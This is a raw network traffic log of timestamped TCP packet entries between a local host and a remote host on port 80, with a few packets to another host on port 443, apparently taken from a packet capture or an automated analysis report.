Dec 7, 2024 10:51:18.642334938 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.643215895 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.643330097 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.643359900 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.643402100 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.644478083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.644510031 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.644555092 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.645438910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.645492077 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.645556927 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.645597935 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.646470070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.646519899 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.646557093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.646699905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.647567987 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.647610903 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.647718906 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.647763968 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.648729086 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.648771048 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.648782969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.648811102 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.649693966 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.649804115 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.649807930 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.649847031 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.650757074 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.650870085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.650895119 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.650923014 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.651844025 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.651900053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.651989937 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.652085066 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.653052092 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.653095961 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.653212070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.653256893 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.656450987 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.656464100 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.656527996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.656565905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.656799078 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.656884909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.657008886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.657062054 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.657856941 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.657912016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.658088923 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.658138037 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.658932924 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.658982038 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.659024954 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.659070969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.659995079 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.660056114 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.660060883 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.660156012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.661082029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.661127090 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.661176920 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.661223888 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.662133932 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.662194014 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.662281036 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.662321091 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.663194895 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.663259983 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.663340092 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.663384914 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.664515972 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.664585114 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.664808989 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.664860964 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.665416956 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.665514946 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.665553093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.665592909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.666474104 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.666517019 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.709975004 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.710052967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.710099936 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.710150957 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.710539103 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.710582018 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.710619926 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.710676908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.711348057 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.711452961 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.711483002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.711533070 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.712579966 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.712642908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.712671995 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.712716103 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.713531017 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.713601112 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.713613033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.713666916 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.714579105 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.714654922 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.714704037 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.714744091 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.715652943 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.715697050 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.715751886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.715787888 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.716723919 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.716784000 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.716842890 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.716898918 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.717850924 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.717911005 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.717927933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.717978954 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.718863010 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.718919039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.719057083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.719101906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.720009089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.720093012 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.720113039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.720132113 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.721049070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.721100092 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.721172094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.721241951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.722121954 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.722229004 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.722239017 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.722284079 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.723162889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.723226070 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.723268032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.723380089 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.724258900 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.724327087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.724364996 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.724427938 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.725348949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.725403070 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.725429058 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.725476027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.726434946 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.726490974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.726548910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.726625919 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.727494955 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.727570057 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.727622986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.727665901 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.728574991 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.728705883 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.728714943 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.728784084 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.729664087 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.729720116 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.729772091 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.729814053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.730707884 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.730771065 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.730813026 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.730868101 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.731812954 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.731872082 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.731973886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.732024908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.732875109 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.732927084 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.732969999 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.733011007 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.733935118 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.733978033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.780694008 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.780741930 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.780798912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.780798912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.781260967 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.781297922 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.781369925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.781498909 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.782315969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.782373905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.782666922 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.782711029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.782737970 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.782752991 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.783775091 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.783854008 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.783894062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.783957958 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.784878969 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.784950018 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.784964085 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.785000086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.785937071 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.785993099 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.786036015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.787002087 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.787065029 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.787085056 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.787127018 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.788062096 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.788125992 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.788177013 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.788233042 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.789163113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.789207935 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.789222002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.789262056 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.790225029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.790278912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.790327072 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.790369987 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.791327000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.791385889 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.791415930 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.791604996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.792553902 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.792601109 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.792671919 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.792735100 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.793471098 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.793579102 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.793582916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.793631077 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.794547081 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.794677973 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.794749975 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.795631886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.795682907 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.795721054 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.795795918 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.796679020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.796725988 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.796828032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.796869040 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.797904968 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.797959089 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.797998905 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.798082113 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.798824072 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.798919916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.798962116 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.799923897 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.799981117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.800048113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.800091982 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.800976992 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.801022053 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.801059008 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.802030087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.848779917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.848826885 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.848859072 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.848882914 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.849255085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.849312067 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.849370956 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.849457026 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.850337029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.850375891 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.850433111 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.851471901 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.851516962 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.851665020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.851738930 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.852395058 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.852436066 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.852497101 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.852641106 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.853441000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.853558064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.853610039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.854460001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.854546070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.854609966 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.855494976 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.855551004 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.855685949 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.855813980 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.856487036 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.856539011 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.856564045 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.856761932 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.857445002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.857506037 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.857561111 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.857722044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.861612082 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.861653090 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.861793995 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.863852024 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:18.863867998 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:18.902245998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.902292013 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.902303934 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.902368069 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.902702093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.902755022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.902777910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.902950048 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.903719902 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.903809071 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.903878927 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.904695988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.904764891 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.904823065 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.904911995 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.905714035 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.905802011 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.905847073 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.906685114 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.906714916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.906783104 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.907747984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.907799959 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.907804012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.907850027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.908724070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.908772945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.908776045 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.908847094 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.910263062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.910274982 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.910324097 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.910708904 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.910851955 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.910913944 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.911653996 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.911712885 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.911717892 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.911912918 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.912607908 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.912664890 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.912736893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.912883043 CET	49713	80	192.168.2.6	185.215.113.206
